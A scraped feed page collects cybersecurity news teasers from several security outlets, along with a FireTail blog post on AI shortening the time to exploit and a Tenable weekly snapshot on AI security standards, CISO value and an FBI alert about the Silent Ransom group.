Read MorePartner content Most security teams face a staggering challenge. They're tasked with protecting themselves against the same advanced threats as any large enterprise, but often have a fraction of the budget, tools, and personnel. It's not uncommon to hear these teams being told to "do more with less." But still, the stakes couldn't be higher.…
Read MoreUncle Sam on Thursday unsealed criminal charges and a civil forfeiture case against a Russian national accused of leading the cybercrime ring behind Qakbot, the notorious malware that infected hundreds of thousands of computers worldwide and helped fuel ransomware attacks costing victims tens of millions of dollars.…
Read MoreA suspected Chinese crew has been exploiting a now-patched remote code execution (RCE) flaw in Trimble Cityworks to break into US local government networks and target utility management systems, according to Cisco's Talos threat intelligence group.…
Read MoreThe Irish Data Protection Commission has cleared the way for Meta to begin slurping up the data of European citizens for training AI next week, ongoing legal challenges notwithstanding. …
Read MoreForeigners in Moscow will now be subject to a new experimental law that affords the state enhanced tracking mechanisms via a smartphone app.…
Read MoreChat app biz Signal is unhappy with the current version of Microsoft Recall and has invoked some Digital Rights Management (DRM) functionality in Windows to stop the tool from snapshotting private conversations.…
Read MoreScotland's West Lothian Council has confirmed that data was stolen from its education network after the Interlock ransomware group claimed responsibility for the intrusion earlier this month.…
Read MoreA 19-year-old student has agreed to plead guilty to hacking into the systems of two companies as part of an extortion scheme, and The Register has learned that one of the targets was PowerSchool.…
Read MoreRussian cyberspies have targeted "dozens" of Western and NATO-country logistics providers, tech companies, and government orgs providing transport and foreign assistance to Ukraine, according to a joint government announcement issued Wednesday.…
Read MoreInternational cops working with Microsoft have shut down infrastructure and seized web domains used to run a distribution service for info-stealing malware Lumma. Criminals paid $250 to $1,000 a month to get access to the infostealer.…
Read MoreCoinbase says the data of nearly 70,000 customers was handed over by overseas support staff who were bribed by criminals to give up the goods.…
Read MoreCrowdStrike is "confident" that the worst-case scenario of its pending lawsuit with Delta will result in it paying the airline a sum in the "single-digit millions."…
Read MoreGoogle has updated its sovereign cloud services, including an air-gapped solution for customers with strict data security and residency requirements, as customers grow uneasy over US digital dominance.…
Read MoreIn a White House press conference on Tuesday President Trump announced his plans for a defensive network of missiles, radar, space surveillance, and attack satellites that he promised would protect America.…
Read MoreAustralian firms with an annual turnover of AUS $3m are now required to report any payments to ransomware groups to authorities
Read MoreFive major banking associations in the US claim the new SEC cyber incident disclosure rule puts a strain on their resources
Read MoreThe FBI provided details of Funnull’s malicious activities, selling infrastructure to criminal groups to facilitate cryptocurrency fraud in the US
Read MoreThe UK MoD has unveiled a new Cyber and Electromagnetic Command, which will focus on offensive cyber operations and “electromagnetic warfare” capabilities
Read MoreSecurity teams should use vulnerability context alongside KEV lists to prioritize patching, OX argued
Read MoreThe firm’s remote monitoring management tool, ScreenConnect, has reportedly been patched
Read MoreFullscreen Browser-in-the-Middle attacks are making it harder for users to detect malicious websites
Read MoreFortinet has identified a new Windows RAT operating stealthily on compromised systems with advanced evasion techniques
Read MoreA threat actor has used ASUS routers’ legitimate features to create persistent backdoors that survive firmware updates and reboots
Read MoreA new EY report found that cybersecurity teams are a major vehicle for business growth, and CISOs should push for a seat at the top table
Read MoreEasyDMARC found that just 7.7% of the world’s top 1.8 million email domains have implemented the most stringent DMARC policy
Read MoreTwo NHS England trusts could see highly sensitive patient records exposed
Read MoreTraditionally, trust came from centralized institutions. Banks, payment networks, and clearinghouses are closed systems. Users cannot see the inner workings, but they rely on external audits, government regulation, and long histories of compliance to feel secure. It’s a model that has and continues to work, but it comes with trade-offs, namely: opacity, concentration of power, and limited innovation. A new model of trust With blockchains and decentralized applications (dApps), a new model of trust has … More
The post Why privacy in blockchain must start with open source appeared first on Help Net Security.
Read MorePhishing scams used to be filled with awkward wording and obvious grammar mistakes. Not anymore. AI is now making it harder to distinguish what is real. According to Cofense, email-based scams surged 70% year over year, driven by AI’s ability to automate lures, spoof internal conversations, and bypass spam filters with subtle text variations. Criminals use AI algorithms to analyze large amounts of data to understand the interests, behavior, and preferences of their target. For … More
The post Using AI to outsmart AI-driven phishing scams appeared first on Help Net Security.
Read More82% of organizations already use AI agents, but only 44% of organizations report having policies in place to secure them, according to SailPoint. While 53% are in the process of developing such policies, the reality is that most remain exposed today. AI agents pose security risks for organizations 96% of technology professionals consider AI agents a growing risk, even as 98% of organizations plan to expand their use of them within the next year. The … More
The post AI agents have access to key data across the enterprise appeared first on Help Net Security.
Read MoreMicrosoft is ending support for Exchange Server 2016, Exchange Server 2019, and Outlook 2016 on October 14, 2025. That date might seem far off, but if you’re managing email systems or Office deployments, it’s worth paying attention to now. These products will keep working past that deadline, but without security updates or tech support, they’ll be risky to keep in production. What’s ending and when? The key date to remember is October 14, 2025. On … More
The post Exchange 2016, 2019 support ends soon: What IT should do to stay secure appeared first on Help Net Security.
Read MoreHere’s a look at the most interesting products from the past month, featuring releases from: Anchore, BalkanID, Cyble, groundcover, Hunted Labs, LogicGate, McAfee, Obsidian Security, Outpost24, PentestPad, ProcessUnity, Resecurity, Searchlight Cyber, SecuX, ServiceNow, ThreatMark, and Verosint. New MCP server from groundcover redefines LLM observability A new MCP server, faster than any other on the market, has been launched from groundcover, the eBPF-driven observability platform. Developers can now enhance their AI-driven workflows with deep system context, … More
The post Infosec products of the month: May 2025 appeared first on Help Net Security.
Read MoreMicrosoft is looking to streamline the software updating process for IT admins and users by providing a Windows-native update orchestration platform, and to help organizations upgrade their computer fleet to Windows 11 with the help of Windows Backup for Organizations. The software update orchestration platform “Today, line-of-business apps, Windows components, Visual Studio, and other products are updated independently,” says Microsoft Product Manager Angie Chen. “Updates across the Windows ecosystem can feel like a fragmented experience … More
The post Microsoft unveils “centralized” software update tool for Windows appeared first on Help Net Security.
Read MoreResecurity has officially launched its AI-driven Compliance Manager. The solution is engineered to help CISOs and compliance teams manage complex regulatory demands, reduce risk, and maintain alignment with global cybersecurity standards. The Compliance Manager delivers centralized visibility, automation, and expert-level guidance to ensure organizations stay audit-ready and resilient in the face of expanding data protection and information security regulations. The platform currently supports over 20 international and regional compliance frameworks, including: GDPR (General Data Protection … More
The post Resecurity Compliance Manager empowers cybersecurity leaders with AI-driven insights appeared first on Help Net Security.
Read MoreCisco unveiled Duo Identity and Access Management (IAM), a new security solution that transforms how organizations combat persistent identity-based attacks that are accelerating in the AI era. Identity is a prime target for bad actors, accounting for 60% of Cisco Talos Incident Response cases in 2024, because current solutions have critical weaknesses that attackers exploit. Duo IAM offers an innovative and security-first approach, with added protection built on its globally trusted multifactor authentication (MFA). Duo IAM … More
The post Cisco Duo IAM protects against AI-driven identity threats appeared first on Help Net Security.
Read MoreAt Span Cyber Security Arena, I sat down with Ria Shetty, Director, Cyber Security & Resilience for Europe at Mastercard. Our conversation cut through the hype and focused on what CISOs deal with every day: how to embed security into innovation, manage supply chain risk, and prepare both systems and people for the threats ahead. For Shetty, the idea that innovation competes with security is a false choice. “They go hand in hand,” she says. … More
The post What CISOs can learn from the frontlines of fintech cybersecurity appeared first on Help Net Security.
Read MoreFraudsters are winning the AI arms race, first-party fraud is rising, and siloed systems are holding back defenses, according to DataVisor. Their 2025 Fraud & AML Executive Report, based on surveys of banks, fintechs, credit unions, and digital platforms, outlines clear signals for CISOs trying to build resilient, forward-looking strategies. Fraudsters have the upper hand The most urgent issue? Criminals are using AI better than most organizations. Three in four respondents said fraudsters currently have … More
The post How CISOs can regain ground in the AI fraud war appeared first on Help Net Security.
Read MoreCybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data
Read MoreESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure
Read MoreESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation
Read MoreThe bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies
Read MoreOur intense monitoring of tens of thousands of malicious samples helped this global disruption operation
Read MoreESET Chief Security Evangelist Tony Anscombe highlights key findings from the latest issue of the ESET APT Activity Report
Read MoreAn overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025
Read MoreOperation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU
Read MoreESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
Read MoreEver wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world.
Read MoreHere’s a brief dive into the murky waters of shape-shifting attacks that leverage dedicated phishing kits to auto-generate customized login pages on the fly
Read MoreWhen we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.
Read MoreHave you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam.
Read MoreFrom the power of collaborative defense to identity security and AI, catch up on the event's key themes and discussions
Read MoreESET researchers analyzed Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks
Read MoreFrom the near-demise of MITRE's CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity
Read MoreYour iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.
Read MoreLook out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements
Read MoreThe form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe.
Read MoreWhat practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.
Read MoreCybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead
Read MoreHere's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data
Read MoreAcademic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?
Read MoreHere’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results
Read MoreWhen a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.
Read MoreCorporate data breaches are a gateway to identity fraud, but they’re not the only one. Here’s a lowdown on how your personal data could be stolen – and how to make sure it isn’t.
Read MoreThe computer scientist and AI researcher shares her thoughts on the technology’s potential and pitfalls – and what may lie ahead for us
Read MoreFrom an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news
Read MoreYour company’s ability to tackle the ransomware threat head-on can ultimately be a competitive advantage
Read MoreSecurity awareness training doesn’t have to be a snoozefest – games and stories can help instill ‘sticky’ habits that will kick in when a danger is near
Read MoreESET researchers also examine the growing threat posed by tools that ransomware affiliates deploy in an attempt to disrupt EDR security solutions
Read MoreOnce thought to be dormant, the China-aligned group has also been observed using the privately-sold ShadowPad backdoor for the first time
Read MoreESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa, BianLian, and Play
Read MoreESET researchers uncover the toolset used by the FamousSparrow APT group, including two undocumented versions of the group’s signature backdoor, SparrowDoor
Read MoreESET researchers detail a global espionage operation by FishMonger, the APT group run by I‑SOON
Read MoreThe group's Operation AkaiRyū begins with targeted spearphishing emails that use the upcoming World Expo 2025 in Osaka, Japan, as a lure
Read MoreESET researchers uncovered MirrorFace activity that expanded beyond its usual focus on Japan and targeted a Central European diplomatic institute with the ANEL backdoor
Read MoreHere's what's been hot on the AI scene over the past 12 months, how it's changing the face of warfare, and how you can fight AI-powered scams
Read MoreWhile relatively rare, real-world incidents impacting operational technology highlight that organizations in critical infrastructure can’t afford to dismiss the OT threat
Read MoreListen up, this is sure to be music to your ears – a few minutes spent securing your account today can save you a ton of trouble tomorrow
Read MoreMalicious use of AI is reshaping the fraud landscape, creating major new risks for businesses
Read MoreBy taking time to understand and communicate the impact of undesirable online behavior, you can teach your kids an invaluable set of life lessons for a new digital age
Read MoreTake a moment to think beyond our current capabilities and consider what might come next in the grand story of evolution
Read MoreBig shifts in the infostealer scene, novel attack vector against iOS and Android, and a massive surge in investment scams on social media
Read MoreWith AI's pattern recognition capabilities well-established, Mr. Schölkopf's talk shifts the focus to a pressing question: what will be the next great leap for AI?
Read MoreRansomware payments trending down, the cyber-resilience gap facing SMBs, and APT groups embracing generative AI – it's a wrap on another month filled with impactful security news
Read MoreThe pioneering multi-media artist reveals the creative process behind her stage show called ARK, which challenges audiences to reflect on some of the most pressing issues of our times
Read MoreA North Korea-aligned activity cluster tracked by ESET as DeceptiveDevelopment drains victims' crypto wallets and steals their login details from web browsers and password managers
Read MoreESET researchers analyzed a campaign delivering malware bundled with job interview challenges
Read MoreSome employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff
Read MoreThe atmospheric scientist makes a compelling case for a head-to-heart-to-hands connection as a catalyst for climate action
Read MoreThe virtual treasure chests and other casino-like rewards inside your children’s games may pose risks you shouldn’t play down
Read MoreEver wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security.
Read MoreDeepfake fraud, synthetic identities, and AI-powered scams make identity theft harder to detect and prevent – here's how to fight back
Read MoreAs AI advances at a rapid clip, reshaping industries, automating tasks, and redefining what machines can achieve, one question looms large: what remains uniquely human?
Read MoreDon’t wait for a costly breach to provide a painful reminder of the importance of timely software patching
Read MoreLeft unchecked, AI's energy and carbon footprint could become a significant concern. Can our AI systems be far less energy-hungry without sacrificing performance?
Read MoreAs is their wont, cybercriminals waste no time launching attacks that aim to cash in on the frenzy around the latest big thing – plus, what else to know before using DeepSeek
Read MoreDeepSeek’s bursting onto the AI scene, apparent shifts in US cybersecurity policies, and a massive student data breach all signal another eventful year in cybersecurity and data privacy
Read MoreYou should think twice before trusting your AI assistant, as database poisoning can markedly alter its output – even dangerously so
Read MoreThe renowned physicist explores how time and entropy shape the evolution of the universe, the nature of existence, and the eventual fate of everything, including humanity
Read MoreDon’t roll the dice on your online safety – watch out for bogus sports betting apps and other traps commonly set by scammers
Read MoreIncoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams
Read MoreESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a new China-aligned APT group we have named PlushDaemon
Read MoreData breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage
Read MoreESET researchers uncover a vulnerability in a UEFI application that could enable attackers to deploy malicious bootkits on unpatched systems
Read MoreThe story of a signed UEFI application allowing a UEFI Secure Boot bypass
Read MoreIn the hands of malicious actors, AI tools can enhance the scale and severity of all manner of scams, disinformation campaigns and other threats
Read MoreSome of the state’s new child safety law can be easily circumvented. Should it have gone further?
Read MoreAs detections of cryptostealers surge across Windows, Android and macOS, it's time for a refresher on how to keep your bitcoin or other crypto safe
Read MoreThe blurring of lines between cybercrime and state-sponsored attacks underscores the increasingly fluid and multifaceted nature of today’s cyberthreats
Read MoreSeeking to keep sensitive data private and accelerate AI workloads? Look no further than AI PCs powered by Intel Core Ultra processors with a built-in NPU.
Read MoreThe prominent AI researcher explores the societal impact of artificial intelligence and outlines his vision for a future in which AI upholds human rights, dignity, and fairness
Read MoreFrom attacks leveraging new new zero-day exploits to a major law enforcement crackdown, December 2024 was packed with impactful cybersecurity news
Read MoreThe first Canadian to walk in space dives deep into the origins of space debris, how it’s become a growing problem, and how we can clean up the orbital mess
Read MoreTake a peek into the murky world of cybercrime where groups of scammers who go by the nickname of 'Neanderthals’ wield the Telekopye toolkit to ensnare unsuspecting victims they call 'Mammoths'
Read MoreESET's Jake Moore reveals why the holiday season is a prime time for scams, how fraudsters prey on victims, and how AI is supercharging online fraud
Read MoreWhile you're enjoying the holiday season, cybercriminals could be gearing up for their next big attack – make sure your company's defenses are ready, no matter the time of year
Read MoreESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for staying secure in 2025
Read MoreA view of the H2 2024 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts
Read MoreOur ‘computers on wheels’ are more connected than ever, but the features that enhance our convenience often come with privacy risks in tow
Read MoreAggregate vulnerability scores don’t tell the whole story – the relationship between a flaw’s public severity rating and the specific risks it poses for your company is more complex than it seems
Read MoreCould attackers use seemingly innocuous prompts to manipulate an AI system and even make it their unwitting ally?
Read MoreAs cybersecurity is a make-or-break proposition for businesses of all sizes, can your organization's security strategy keep pace with today’s rapidly evolving threats?
Read MoreBuying a pre-owned phone doesn’t have to mean compromising your security – take these steps to enjoy the benefits of cutting-edge technology at a fraction of the cost
Read MoreWe’re on the cusp of a technological revolution that is poised to transform our lives – and we hold the power to shape its impact
Read MoreCybersecurity compliance may feel overwhelming, but a few clear steps can make it manageable and ensure your business stays on the right side of regulatory requirements
Read MoreESET's CEO unpacks the complexities of cybersecurity in today’s hyper-connected world and highlights the power of innovation in stopping digital threats in their tracks
Read MoreZero days under attack, a new advisory from 'Five Eyes', thousands of ICS units left exposed, and mandatory MFA for all – it's a wrap on another month filled with impactful cybersecurity news
Read More‘Tis the season to be wary – be on your guard and don’t let fraud ruin your shopping spree
Read MoreESET researchers make a discovery that signals a shift on the UEFI threat landscape and underscores the need for vigilance against future threats
Read MoreESET researchers analyze the first UEFI bootkit designed for Linux systems
Read MoreThe backdoor can execute commands and lets attackers download additional modules onto the victim’s machine, ESET research finds
Read MoreESET Research details the analysis of a previously unknown vulnerability in Mozilla products exploited in the wild and another previously unknown Microsoft Windows vulnerability, combined in a zero-click exploit
Read MoreESET researchers analyzed previously unknown Linux backdoors that are connected to known Windows malware used by the China-aligned Gelsemium group, and to Project Wood
Read MoreThe veteran of four space missions discusses challenges faced by the Hubble Space Telescope and how human ingenuity and teamwork made Hubble’s success possible
Read MoreTired of dodging all those 'Scam Likely' calls? Here's what’s behind the label and how to stay one step ahead of phone scammers.
Read MoreESET Chief Security Evangelist Tony Anscombe highlights some of the most intriguing insights revealed in the latest ESET APT Activity Report
Read MoreESET researchers introduce the Gamaredon APT group, detailing its typical modus operandi, unique victim profile, vast collection of tools and social engineering tactics, and even its estimated geolocation
Read MoreSix New York residents were charged with running a complex scheme that involved fraudulent documentation and unauthorized payment systems to steal as much as $30 million from the country's food stamp program that tens of millions of Americans rely on every month.
The post USDA Worker, 5 Others Charged in Food Stamp Fraud Operation appeared first on Security Boulevard.
Read MoreSentinelOne's commercial customers consoles went down for about six hours May 29 in what the company says wasn't a "security incident," but it still faces questions from a customer based that wants to know what happened and why communication from SentinelOne about the issues was bad.
The post SentinelOne Outage Leaves Security Teams Hanging for Six Hours appeared first on Security Boulevard.
Read MoreAuthor/Presenter: John-André Bjørkhaug
Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino; and via the organizations YouTube channel.
The post BSidesLV24 – PasswordsCon – All Your Badge Are Belong To Me appeared first on Security Boulevard.
Read MoreFive years post-pandemic, half of CISOs at enterprises with revenue of $20 billion or more now hold EVP- or SVP-level titles.
The post Million-dollar Salaries, Board Influence Mark the CISO’s Rise appeared first on Security Boulevard.
Read MoreThe post Vulnerability Management: Hidden Costs, Confidence Shortfalls, and Siloed Processes appeared first on AI Security Automation.
The post Vulnerability Management: Hidden Costs, Confidence Shortfalls, and Siloed Processes appeared first on Security Boulevard.
Read MoreMay 30, 2025 - Timo Rüppell - The Sequential Kill Chain for AI-Powered Attacks
Excerpt: We’ve talked before about Mean Time To Attack, or MTTA, which has grown alarmingly short for new vulnerabilities across the cyber landscape. In this blog, we’ll dive into the “how” and “why” of this…
Summary:
In our current cyber landscape, Mean Time To Attack is shorter than ever, and all signs point to AI being involved. And in the meantime, Mean Time to Patch isn’t getting shorter…
Blog text:
AI security is a critical challenge in 2025. Developers and security experts are struggling to stay ahead of attacks that are continuing to rise in volume and complexity. We’ve seen a rapid increase in the number of breaches and new kinds of attacks, such as indirect prompt injection. Many researchers believe that AI is partially responsible for attacks growing and advancing at such a rapid rate. Mean Time To Attack, or MMTA, is the time it takes for a new vulnerability to be exploited in the wild. In recent years, we’ve seen this number decrease dramatically to only 22 minutes. On the other hand, the Mean Time To Patch, or MTTP, is still extremely long, sitting around 50 to 160 days, which is more than enough time for attackers and bad actors to exploit the vulnerabilities repeatedly and even find more weak spots. Pictured below is the Sequential Kill Chain for AI-Powered attacks. The early stages of the kill chain- Recon, Weaponize, and Deliver, to Exploit- are occurring at a rate that seems too fast to not be automated in a lot of cases. If hackers had to do each step manually- reconnaissance into APIs or web apps looking for vulnerabilities, figuring out how to exploit them, then building and deploying the code, delivering these attacks until one of them is successful- it would take a lot longer than 22 minutes, even with the most experienced threat actors. And we already know this is possible from cases like when researchers got ChatGPT 4 to exploit one-day vulnerabilities. They tested this method across 15 different sites, container management software, and Python packages. Their findings were shocking. ChatGPT was able to correctly exploit one-day vulnerabilities 87% of the time. (IBM)
So what does this mean?
Developers and security teams need to work together and stay vigilant and aware of the risks. Since vulnerabilities are being exploited so rapidly, they need to be addressed proactively and the best way to do this is to employ the principles of “secure by design.” “Secure by design,” is effectively the process of eliminating vulnerabilities as you build. There are multiple types of ways to employ “secure by design,” including code analysis and continuous security testing throughout every stage of development. Now more than ever, security needs to be a top concern from code to cloud. We’ve talked before about how secure by design is the best way to enforce security postures before platforms even go live in their environment. But with MTTA sitting so incredibly low, and MTTP remaining high, this construct is even more critical. And unfortunately, it seems like this problem is going to get worse before it gets better. Based on the data, the industry behavior around patching has been consistent for the past two decades. Quite simply, vulnerabilities are not taken seriously enough. There also may be a need down the line for automated deployments that can fix a vulnerability and deploy the patch within minutes, instead of months. One of the best ways to do this is to rely heavily on infrastructure as code, with fully automated pipelines. Once a vulnerability is identified, push the patch in code, and initiate a build and deploy automation. This is the same for both AI security and API security. APIs power the different platforms that provide data to LLMs, so without APIs, there is no AI. Therefore: AI security is API security. And as with vulnerability exploit mitigation, the best way to fix an API is in the security of its design. Analyzing the design for security weaknesses with automated testing during the design and build phase, coupled with automated updates when issues are fixed, leads to the best and most consistent security outcomes.
Takeaways
We are seeing a rapid surge of attacks powered by AI. AI can automate steps of the sequential kill chain, as we’ve already seen with OpenAI, making it much simpler to find, analyse, and exploit vulnerabilities in real-time. For this reason, researchers suspect AI is responsible for the decrease in Mean Time To Attack of vulnerabilities. On the other hand, Mean Time to Patch remains high for vulnerabilities across the board, leaving them open to attack for prolonged periods of time. The only solution is for developers and security teams to stay vigilant by employing practices such as “secure by design,” continuously testing APIs, and patching vulnerabilities proactively, so attackers won’t even have the 22 minutes they need to find and target the weaknesses. Looking for ways to simplify your team’s AI security posture? FireTail can help. Set up a demo or start your free trial today.
The post The Sequential Kill Chain for AI – FireTail Blog appeared first on Security Boulevard.
Read MoreAuthor/Presenter: Filipi Pires
Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino; and via the organizations YouTube channel.
The post BSidesLV24 – PasswordsCon – Cloud Attack: Dissecting Attack Paths With Graph-Mode appeared first on Security Boulevard.
Read MoreIn 2024, enterprise investments in generative AI skyrocketed. Microsoft alone committed over $10 billion to OpenAI, and according to a Gartner report, more than 80%...Read More
The post Why AI Hallucinations Are the Biggest Threat to Gen AI’s Adoption in Enterprises appeared first on ISHIR | Software Development India.
The post Why AI Hallucinations Are the Biggest Threat to Gen AI’s Adoption in Enterprises appeared first on Security Boulevard.
Read MoreSC World recently noted that there were three points missing from agentic AI conversations at RSAC. I agree. Many new technologies arrive with significant fanfare. Agentic AI is no exception. However, we must prioritize practical validation over promises. Without thorough proof of concepts (PoCs), our security operations cannot truly integrate these tools. Without clear ROI metrics, we cannot justify the investment. Our long-term security posture depends on this disciplined approach.
The post Cybersecurity Insights with Contrast CISO David Lindner | 05/30/25 appeared first on Security Boulevard.
Read MoreCheck out ETSI’s new global standard for securing AI systems and models. Plus, learn how CISOs and their teams add significant value to orgs’ major initiatives. In addition, discover what webinar attendees told Tenable about their cloud security challenges. And get the latest on properly decommissioning tech products; a cyber threat targeting law firms; and more!
Dive into six things that are top of mind for the week ending May 30.
What is the proper way to secure your artificial intelligence models and systems? Are you confused by all the different AI security recommendations and guidance? The European Telecommunications Standards Institute (ETSI) is trying to bring clarity to this issue.
ETSI, in collaboration with the U.K. National Cyber Security Center (NCSC) and the U.K. Department for Science, Innovation & Technology (DSIT), has published a global standard for AI security designed to cover the full lifecycle of an AI system.
Aimed at developers, vendors, operators, integrators, buyers and other AI stakeholders, ETSI’s “Securing Artificial Intelligence (SAI); Baseline Cyber Security Requirements for AI Models and Systems” technical specification outlines a set of foundational security principles for an AI system’s entire lifecycle.
Here's an overview of the five stages of an AI system and the 13 security principles that must be adopted:
Each one of the 13 security principles is further broken down into multiple provisions that provide detailed requirements.
For example, in the secure maintenance stage, ETSI calls for developers to test and evaluate major AI system updates as they would a new version of an AI model. Also in this stage, system operators need to analyze system and user logs to detect security issues such as anomalies and breaches.
The 73-page companion technical report, “Securing Artificial Intelligence (SAI): Guide to Cyber Security for AI Models and Systems,” offers significantly more technical detail about each provision.
Together the technical specification and the technical report “provide stakeholders in the AI supply chain with a robust set of baseline security requirements that help protect AI systems from evolving cyber threats,” reads an NCSC blog.
For more information about AI security, check out these Tenable resources:
Cybersecurity teams’ involvement in large-scale organizational initiatives yields significant monetary benefits – especially if CISOs are incorporated early into these efforts.
That’s a key finding from Ernst & Young’s “2025 EY Global Cybersecurity Leadership Insights Study,” which surveyed 550 C-suite and cybersecurity leaders globally from organizations with more than $1 billion in annual revenue.
Specifically, the study found that cybersecurity teams contribute a median of $36 million to every enterprise-wide initiative they’re involved in. That’s equivalent to between 11% and 20% of the value of each project.
“CISOs who are involved early in cross-function decision-making generate more value than those who were consulted late or not at all,” the report reads.
“CEOs, CFOs and boards should take steps to more meaningfully integrate cybersecurity into transformations and other strategic initiatives,” it adds.
The finding points to how CISOs and their cybersecurity teams are expanding their scope from managing security, risk and compliance to becoming “key enablers of business growth.”
Unfortunately, over the past two years, cybersecurity budgets have shrunk as a percentage of annual revenue, and only 13% of surveyed CISOs said they get looped in early into critical business decisions.
Using a framework, the report concluded that cybersecurity adds considerable value to these six key types of initiatives:
For more information about how CISOs and their cyber teams add value to business ventures:
During our recent webinar “Confident in the Cloud: How to Overcome Complexity and Get AWS Security Right,” we asked attendees about their cloud security practices and challenges. Check out what they said.
(137 webinar attendees polled by Tenable, May 2025)
(60 webinar attendees polled by Tenable, May 2025)
Interested in learning about proven best practices for how to control and secure your AWS environment? Watch this webinar on-demand!
It’s important to properly dispose of software and hardware products after removing them from your IT environment.
To help organizations with this process, the U.K. National Cyber Security Centre (NCSC) has published guidance on how to securely retire obsolete technical wares.
“Decommissioning can be highly expensive and complex, with potentially severe repercussions if not executed properly,” the NCSC document reads. “Outdated or unsupported assets can pose an unacceptable risk to the organisation.”
For example, an improperly decommissioned IT product could allow unauthorized people to access confidential data and could be used to breach services and devices.
The NCSC guidance, titled “Decommissioning assets,” addresses topics including:
For more information about properly disposing of obsolete hardware and software:
Hacker group Silent Ransom is targeting law firms via phishing calls and emails aimed at tricking employees into granting it remote access to their computers. Once they gain remote access, the attackers steal confidential data and use it to extort the victims.
So said the U.S. Federal Bureau of Investigation (FBI) in an alert titled “Silent Ransom Group Targeting Law Firms.”
Silent Ransom, also known as Luna Moth, Chatty Spider and UNC3753, employs two different schemes:
Detecting a Silent Ransom attack is difficult. Its hackers don’t leave behind traditional attack indicators because they use legitimate remote-access and systems-management tools. Thus, to spot a Silent Ransom breach, the FBI recommends looking for:
To mitigate the threat, FBI recommendations include:
For more information about remote access attacks:
The Center for Internet Security has updated its CIS Benchmarks for Kubernetes, Azure Kubernetes Service and Microsoft Intune, and has released a new CIS Benchmark for Red Hat Enterprise Linux Security Technical Implementation Guide (STIG).
These are the CIS Benchmarks updated in April:
Meanwhile, the brand new Benchmark is CIS Red Hat Enterprise Linux 9 STIG Benchmark v1.0.0.
Organizations can use the CIS Benchmarks’ secure-configuration guidelines to harden products against attacks. Currently, there are more than 100 Benchmarks for 25-plus vendor product families in categories including:
To get more details, read the CIS blog “CIS Benchmarks May 2025 Update.” For more information about the CIS Benchmarks list, check out its home page, as well as:
CIS Benchmarks
The post Cybersecurity Snapshot: New Standard for AI System Security Published, While Study Finds Cyber Teams Boost Value of Business Projects appeared first on Security Boulevard.
Read MoreTwo critical vulnerabilities affecting the open-source forum software vBulletin have been discovered, with one confirmed to be actively exploited in the wild. [...]
Read MoreMicrosoft announced today that the Windows 11 Notepad application is getting a text formatting feature supporting Markdown-style input. [...]
Read MoreAn international law enforcement operation has taken down AVCheck, a service used by cybercriminals to test whether their malware is detected by commercial antivirus software before deploying it in the wild. [...]
Read MoreThe Federal Criminal Police Office of Germany (Bundeskriminalamt or BKA) claims that Stern, the leader of the Trickbot and Conti cybercrime gangs, is a 36-year-old Russian named Vitaly Nikolaevich Kovalev. [...]
Read MorePentesting isn't just about finding flaws — it's about knowing which ones matter. Pentera's 2025 State of Pentesting report uncovers which assets attackers target most, where security teams are making progress, and which exposures still fly under the radar. Focus on reducing breach impact, not just breach count. [...]
Read MoreMozilla has rolled out an emergency Firefox 139.0.1 update after the Tuesday release caused graphical artifacts on PCs with NVIDIA GPUs. [...]
Read MoreThe Microsoft Authenticator app is now issuing notifications warning that the password autofill feature is being deprecated in July, suggesting users move to Microsoft Edge instead. [...]
Read MoreIT management software firm ConnectWise says a suspected state-sponsored cyberattack breached its environment and impacted a limited number of ScreenConnect customers. [...]
Read MoreThreat actors are abusing the trusted Google platform 'Google Apps Script' to host phishing pages, making them appear legitimate and eliminating the risk of them getting flagged by security tools. [...]
Read MoreA weakness in Apple's Safari web browser allows threat actors to leverage the fullscreen browser-in-the-middle (BitM) technique to steal account credentials from unsuspecting users. [...]
Read MoreThe U.S. Treasury Department has sanctioned Funnull Technology, a Philippines-based company that supports hundreds of thousands of malicious websites behind cyber scams linked to over $200 million in losses for Americans. [...]
Read MoreThreat actors linked to lesser-known ransomware and malware projects now use AI tools as lures to infect unsuspecting victims with malicious payloads. [...]
